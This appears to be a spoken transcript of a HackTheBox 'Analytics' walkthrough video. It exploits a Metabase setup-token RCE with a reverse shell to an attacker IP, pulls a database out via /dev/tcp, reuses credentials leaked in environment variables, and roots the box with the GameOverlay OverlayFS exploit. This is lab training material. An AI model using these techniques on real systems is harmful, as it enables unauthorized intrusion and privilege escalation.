What's going on YouTube? This is Ipsec. I'm doing analytics from HackTheBox, which was a pretty easy machine if you don't care about understanding what exploits are doing, because everything is just copy and paste, right? The foothold was in Metasploit, so you just discover Metabase is running, and you can either throw the exploit or go do some research, discover how to enumerate the version, and validate the exploit will work before you throw it. And then once you get a shell, you just look at environment variables. It leaks a secret that you can use to SSH into the box, which is running an out-of-date kernel, and it's vulnerable to the GameOverlay exploit. It's probably vulnerable to other things, but that is the intended one. And a little while ago when this was released, a lot of people were tweeting it out because the privesc actually fits in a tweet. You can just copy and paste the privesc one-liner, throw it in, and you're root. But we're going to understand what each of these exploits are going to do and do everything manually because I think that's where all the fun is. So with that being said, let's just jump in. As always, we begin with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it analytics, then the IP address of 10.10.11.233. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us Nginx also running on Ubuntu. And there's also a script telling us that it forwards all requests to analytical.htb. So let's go ahead and add that to our host file. So sudo v etc host. And then we can add 10.10.11.233 analytical.htb. And let's go browse to it. So let's go 10.10.11.233. And looking at this page, the first thing I want to try to identify is if I know what framework this is running. Is this just a static site? Is it WordPress, Joomla? What's the backend look like? And this, nothing really stands out. We could try like index.html. We get this page. We could try PHP. We get not found. I'm going to guess this is a static website. The second thing I always look for are usernames. And we could log all these if we ever have to like brute force users. We could build a word list like JSmith, a Kirigo, things like that. And then the last thing I look at is any type of place we can insert user input, right? So if I do this, and I'm going to click send, it's just going to redirect me back here. So it's not really sending any data. That's a lot of HackTheBox machines. That's how you know you can kind of ignore this contact form because it just redirects you. It's not sending data. We do have analytical.com as the domain there. We also have analytical.com, but nothing really sticks out to me. If I click these links, it looks like it goes to the page. But if I click login, we get redirected to a domain data.analytical.htb. So let's add this to our host file. So sudo v etc host. And then we can add data.analytical.htb, refresh, and we get a page called Metabase. And this is, I think, an open source application. It's not like part of their static page. And the first thing I always like doing is just looking at the headers, right? So before we even look for exploits, I just want to find more information about this. So let's turn intercept on and refresh both of them. So I'm going to send that to repeater. Did I turn intercept back on? I did. And let's send this to repeater. So we don't want maps, fonts. There we go. Okay. I'm going to name this request homepage. This one's going to be Metabase. I'm going to make a request on both of them. And I just look at the server header. So I see Nginx. I'm going to do here. And the Nginx version matches up. So that tells us the same Nginx. Sometimes you'll see this different, and if it's different, it's probably going into a Docker container or just going to a different host, right? This expiration is a bit odd. July 3rd, 2001. That is an old thing. Normally when I see old, I always look for CVEs. I don't think this software is from 2001. I don't know exactly why that's happening. We see the date on the server. And the date does match up. GMT, GMT. Sometimes you'll find the time zones different as well. That points to it being a different web server. The other thing you can look at, and I think this is Docker, and it's not going to do it, but the TTL. Sometimes you can identify like if there's a firewall or like some type of router, like web application firewall. I'm trying to think. Reverse proxy, that's the word, by looking at TTLs, right? So I would also go with like TCP dump. So TCP dump -I ton 0, and I can say source port on 80. And then when we make a request to each of these, so I'll make a request to the home page, we see the TTL, we have to actually do a -V for verbose. I'm also going to add the -N flag so we don't do DNS. We can see that the response is always going to be 63. If we do it for the data one, the response is also 63. So if you don't know what TTL is, this is time to live. Whenever it performs a network hop, this decrements. I think the network hop in Docker is done through IP tables on Linux, and that doesn't decrement when doing it. Doesn't treat it as a network, despite it going from the probably like ETH0 adapter to the Docker 0 adapter to get that. It just doesn't decrement the TTL, so you can't fingerprint it that way. But if this was a different box, like we had some type of NAT and planet redirecting us to different networks, this TTL would help us fingerprint that, right? It's also useful for like reverse proxies. I've seen this actually be a way to enumerate that one exists and you know that it exists. It doesn't really help you that much, but in the terms of recon, I'd rather look at that than not look at it, right? So let's look at Metabase. The first step is always to just look for any known CVEs. So we'll go to exploit DB, and you can run searchsploit on your local box. I'm bad about keeping my stuff up to date, the typical security person, right? So I always go to the source because I know it's going to be up to date. We have a February 15th of 2024, something was uploaded, Metabase 046.6. So we want to see if we can get the version of Metabase. I'm sure if we Googled around, we could find it, but find someone talking about it. However, we could just do it manually, right? The first thing I always look for is just searching version in the source. And Firefox is going to be weird about this. Like we can see it highlights this, but this isn't version right here. It's just like this whole wrapping is too long for Firefox to know what to do with. But if we went over to curl or even Burp Suite, it would be a bit easier to read. So if I curl data.analytical.htb, and let's just grep for version. So we see version right here, date, tag, and we see 046.6. So this exploit would work. It's in Metasploit, which is probably what this is talking about, or they're using a Python one. There's also a Metasploit one, but I don't think we're going to learn as much if we just run the exploit, right? So let's do a little bit of research, make it hard for us. Whenever in like CTFs, I like stepping through it because you may learn like something the creator of the exploit did. You learn more about it. So when you're going on the hunt, you find things better, right? If you just run the script, you're not really learning. If I was on the job and like time was critical, I'd probably just like run the script, but I'm learning here, right? So we Google Metaspace this, let's see. Is this one? There's an exploit analysis. There we go. This is what I wanted, the asset note. So we can close these. This is a really good one that's talking about it. I think these are the people that found the exploit. If you didn't want to use HackTheBox, you could just use Docker to spin up the vulnerable version. This is always a great thing to do. Essentially, the whole exploit revolves around you getting this setup token. And I think the setup token is used, like when you first set it up, it grants you access in order to create a Metabase instance and like create the default user and stuff. And the setup token should be nulled out, but for some reason it isn't. And we can access it, right? So it says we can view API session properties that is accessible without auth. So let's go ahead and view this. So I'm going to go to Metabase. I'm going to make a GET request here. And we accessed it. We have information here. Let's see. I'm just going to search for a token. Let's go. We got two matches. Go to the second match. And we have setup token right here. So we're able to get the setup token. So we can complete the setup, and through this is where RCE is. Right here, they're talking about like how it happened. Eventually, they landed on a commit made in January 2022. And they're looking at this because when they searched the internet, they found a lot of the Metabase servers did not have a setup token there, but some of them did. And it translated down to this commit in January 2022, removed this line. You can see these are in red. So they're removing that clear token. So it just left the token in that config. So any Metabase server stood up after that day would leak its setup key. And then it can use a setup key in order to get code execution. They talk about going into the H2 database driver, which I think is like a SQL driver in Java, maybe. I don't know exactly what it is. But the normal way they got code execution through the init parameter was blocked by a blacklist because other vulnerabilities just use this. So think of this like a lol bin or just a gadget chain to get RCE. So they blocked this one. So once they had access, they were looking for other ways to execute it, and they found trace level system out would also enable code execution. So here they're talking about chaining everything together, and we're not going to do this one because this is kind of just proving it. I guess we could. It's not getting code execution here. This is their way to prove it's vulnerable. So we have them using the metabase.jar, and this is also interesting. They can go in the jar file and pick a sample database. And they did this because they're touching a database. If they screw up, they can hose the database itself and take Metabase down. However, through this zip wrapper, they can go in the jar and get the sample database. So they're never touching the prod database, so they don't risk taking it down. It's always good to do that. And we can see them doing this. It's kind of like an SQL injection trick, they say. They eventually hit the system trace out. Let's see, where was that? Right here. They create the trigger. And then right here, they're using a JavaNet URL to open a connection. So this doesn't give RCE. It's just a way to enumerate it is vulnerable. So let's go ahead and copy this. And we will Control R. Let's change the request method. I'm going to change it to application JSON. Always modify your content type. And then when we paste this, and it wasn't properties, right? It was setup validate. We're going to get a failure here because I forgot to do one thing, the token. So let's go ahead and grab our token. That was right here. So I'm going to grab this, go over here. We'll put in the token, and it's hung because it's trying to reach example.com. Let's go to 10.10.4. Whoops. Let's go 10.10.14.8. And let's see. We could stand up a simple HTTP server, but I am not. I'm just going to use netcat. And the reason why is I want to see all the headers that come across. So I'm going to do nc lvnp 8000. I'm going to send this request again. Go here, and we can see Java reaching back to us, right? And the whole reason I didn't do the Python SMTP server or HTTP server is we miss a lot of the data that you get from the headers. Like my initial exploit, I always like seeing user agent, things like that, right? So we have that. If we keep reading the post, they talk about a good way to get code execution. Is that this one right here? Zip meta database. Let's go here. Yep, they're doing a bash payload here. So I'm going to copy this database line. Let's go here. Copy everything, paste. And this is a way to avoid spaces, right? So they're doing the echo command here, and whenever there's a space in this bracket, a comma in the bracket, it's going to translate to a space. And I think they did this because arguments are delimited by space, and they did a --c here. So instead of like dealing with quote apocalypse, because they used a single quote here and a double quote here, they could probably like escape a quote, right? They decided, let's just treat space as a bad character and avoid it, which I like. We got to replace this. And this is just a reverse shell. So let's do echo -n. Let's see, they're calling it with bash -i. I think we just do this. Well, they called it with bash -i, so that should be fine. 8, 9001, 0, and 1. And then let's pipe it over to base 64. And they didn't do this. I always like doing it, and you're getting rid of any dangerous characters. So let's see, where is that plus? There we go, no plus there. Add a space here, no plus there. So now this is just pure alphanumeric. It's just one thing I always like doing because that plus could screw you up and waste a lot of time. So we have this exploit. Let's listen on 9001. Run it, it's hung, and we get a connection back. Awesome. So it looks like it's working. We don't have an actual prompt. That's why I always do V, because if I didn't do V there, let's just show you. We run. Maybe Control Z a few times. I think I have a connection right now, right? I don't see anything. LS, I do. But with the V, it tells you when that connection's made, which is really nice, right? So if it doesn't send you a shell, you'll get one next time, like when you type a line. So let's do Python 3 import pty spawn bin bash. Ooh, do we have script? We don't. So we can't get a proper pty. So in that case, I like using RL wrap just so I have my up and down arrows. Can we just type bash and get a prompt? That's annoying. I'm sure we could finagle away and get it, but I'm not going to waste time. So let's see. We're in Metabase. We could strings metabase.db, lsla, metabase.db. Let's see. Does this is this a symlink? Stat. Oh, it's a directory. Okay. And we could strings it to see if we can get like any credentials out of it. It's probably SQLite. Oh God, that's a lot of data. That was a mistake. That was a big mistake. Okay. We can file against it, metabase db move db. Let's just send it to ourselves. nc lvmp 9001 to metabase db move db. We can cat this to dev tcp 10.10.14.8 9001. There we go. And then we can file against it. We just get data. The other thing we want to do is try to figure out credentials, right? If we do lsla on /, we do know we're in a Docker environment. There is app. So let's go in /app, run metabase.sh. Let's see. Don't see anything there. I was like looking for a configuration file, right? Another good thing to do whenever you're on a web server, we are the Metabase user. We can look at the environment and see what environment variables there are, because that may also just hold the credentials if you can't find the config. We don't have the DB pass. The host name is probably the Docker container, JDK, database file. And we have a user and password, Metalytics and Analytics DS 2023. So let's go ahead and try SSH. Let's just copy this at 10.10.11.233. And then let's try this password. And we get logged in. Awesome. So now this next step is a little bit hard to find. It's just one of those things you should always look at. Because I don't know any good like easy automated tools to run. Maybe Linux exploit suggester finds it. And if it does, then linp should find it because linp imports this. Let's just run it. Because it's a kernel exploit. And you may think, like, why can't they just look at the version of the kernel and know it's vulnerable, right? The thing is, so many distros have so many versions of kernels and they all label it somewhat differently. And it's just a huge pain to find if something's affected, right? Because this Ubuntu, let's see, cat etc lsb release, we're on Jammy. If we're on Focal or something, like all the versions would be different. Like sometimes the 5 version's vulnerable as well as the 6. It's a whole mess. You may think it's easy, but like until you start looking at it, you realize what difficulty it is making a program that looks at a kernel and identifies it's vulnerable. And maybe I'm wrong. Maybe it is easy, but I remember running Linux exploit suggester once being like, man, I could do a better job with that. And the answer was, oh my God, there's so many hard ways to like weird things I didn't think of when trying to do this. So let's just run this. So we will run. Let's see. This is why you get all these old CVEs. Like we can ignore all these 2021 ones. And I don't think it found it. And that may just be like it's not in the database, or maybe it didn't flag correctly, right? We see it updated last month. So let's just go with uname-a, and I'm going to Google this. So if we say that exploit, I'm guessing we'll get the GameOverlay exploit, right? Yeah, we get one right here. Oddly enough, Linux exploit suggester comes up. And there's a lot of hype around this vulnerability. This is the one that everyone was talking about. It can fit in a tweet that you can privask, right? Here's the original payload. Here's one adjusted for Twitter. Let's see. Let's just run it. And instead of OS system ID, actually make directory exploit cd exploit make dir1. It'll be easier to like run multiple things this way. So if I just run this, boom, I am root. And we can go in root. We should have. I'm not sure why that one didn't work. Let's see. Upper. Import OS, OS set UID 0, OS system. I wonder if it's, I bet it's bash without the /p or -p. Nope, it worked that time. I don't know why when I pasted it didn't work, right? But we don't really learn anything doing it that way. Just running it. So let's talk about this exploit. The better one to go to is this blog post. I think I talked about it in 2 million as well, because this vulnerability is really funny. And they talk about it here. Essentially, overlay FS is a complicated file system. And I mainly know it for Docker, because what it enables you to do is lay a file system on top of another one, right? And you may be confused why you want to do that, right? So let's say you have a Docker image and you want to spawn 4 containers off that image. You don't want to make the root file system 4 times because that's going to take a lot of disk space. So you'd make that root file system on the lower thing, and then the upper would be the changes you make to that file system, and that would be your container, the combination between lower and upper. And that way you can use the same base directory structure for multiple containers and not take up more space, because the upper directory is just tracking the changes. And hopefully I didn't like mix up the two, but that is my understanding of overlay FS. Now, the vulnerability comes into play with special file attributes. A long time ago, well, maybe not a long time ago, I think it was earlier 2023, or whenever 2 million was, when you did something with this file system, the set UID bit would stick. And that created a privask, because when you're in the upper namespace, you can set your user to be whatever you want. So you'd create a setuid file, get it cloned over, then you exit that namespace, and now bash has setuid and you can execute it as root. That's bad, right? They fixed that, but they forgot about capabilities, which is another way binaries can escalate privileges, and we could exploit it again. And that's what this is. So let's take a look through the exploit. I think I just closed it, right? No, we have this Twitter one. We'll use this. Okay. Let's see. Is that the full payload? It's missing an unshare, right? Yeah. Okay. So the first thing it does is it's going to do unshare-rm. This is also an argument to execute a command, but we're not going to do that right away. So we're just going to do unshare rm. And I forget the M does. The R is going to be root. Let's see, -m. And mount. So essentially this, we created a root namespace. Now we're not really root. If I go to ls/root, we can't open it. We're just root in the namespace we created. So in this namespace, we're going to create a lower directory and upper directory. I think this is a working directory, and M I think is merge. So we create all those. And then for the sake of saving space, they use all these stars, but really they just want to copy Python 3. So let's do user bin Python 3 into the lower. Okay. So now we want to set the capability of Python 3. So we're giving it the setuid capability. And now we're going to perform the mount. So we'll do mount-t overlay -o, remount lower directory is equal to low, upper directory is equal to u, work directory is equal to w, and m, I want to say is merge. I may be wrong with that. So now we created the structure. And what we're going to do is we're going to touch every file in this M directory. And what that's going to do is signify a change to it. So the system copies it from the lower directory to the upper directory. Okay, we've done that. And, oh, they have to put an exit here, I think. So the exploit is done. So now if we do Python 3 on the upper directory, we execute the upper directory's Python 3. We can import OS set UID 0, and then OS system bash, and then ls root. So we just did that exploit manually. Now, the really weird thing, let's go back a step. If we look at this, so let's just do a LSLA on upper Python 3 and lower Python 3. They look the same. That's right. We use capabilities, not setuid. Let's do a get capability. Lower Python 3, we have that capability. Upper Python 3. So you would think I can execute this, right? What's going to happen if we import OS, because we do see these look the same, right? And we'll do os.setUID 0. Womp womp. Operation not permitted. This is really bizarre, right? These files have the same capability. What happened here? Well, what happened is there's a second bit that gets set, and that's when the system copies it from the lower to the upper. It's going to start trusting the namespace. And you normally can do it with like get fatter, I think, like that, but this binary doesn't exist on a machine. So in order to work around that, I'm going to make a Python script. And we're going to use the OS module to pretty much mimic what we wanted to do with get fatter. So we'll import OS, and then we'll say lower is equal to L Python 3. And we can say for attribute in OS list X attributes on lower. Then we want to get the value. So we'll get X attribute on the same thing. and we want to just print it. So we'll print attribute value. Then let's do the same thing for the upper. Man, I scripted this horribly, but oh well, no point of return. Okay. Python 3, temp.py, get x is missing attribute. ATTR, that's what we need. I think it's file, then that. There we go. The capability is slightly different. I honestly expected something a little bit different. I wanted it to show me the capability that I'm missing, because you can see these are definitely different, but not in a way expected. Let's just clean up this by putting a print lower and a print upper here, so we know exactly what programs we're looking at, right? And when you run that, we have this. I'm guessing if I was root, maybe that would change it up. But I don't know what these bits are in the security capability, and that may be what is screwing it up. So it's either those bits are important, and I don't know how to read this, or let's do u python 3, import os, set uid 0, os system, bash, and we can exploit or run this again. And that's what did it. We also have a trusted overlay origin bit. So it's either this or the file having this, and these bits say, hey, don't trust this capability. It came from overlay FS. Don't know what that is. Or maybe it's this saying, use the permission bit in the overlay system. And that's how it gets the root user. Really don't know exactly why, but the main goal here was just showing you that sometimes your tools lie. And when you do like the, was it get fackle or get cap? Yeah, it was get cap. UPython 3, LPython 3, like they look the same, but when you look at them more in depth, you can see they're different. So that's going to be the box. Hopefully you learned a little bit about the overlay FS exploit and Metabase and enjoyed the video. Take care, and I'll see you all next time.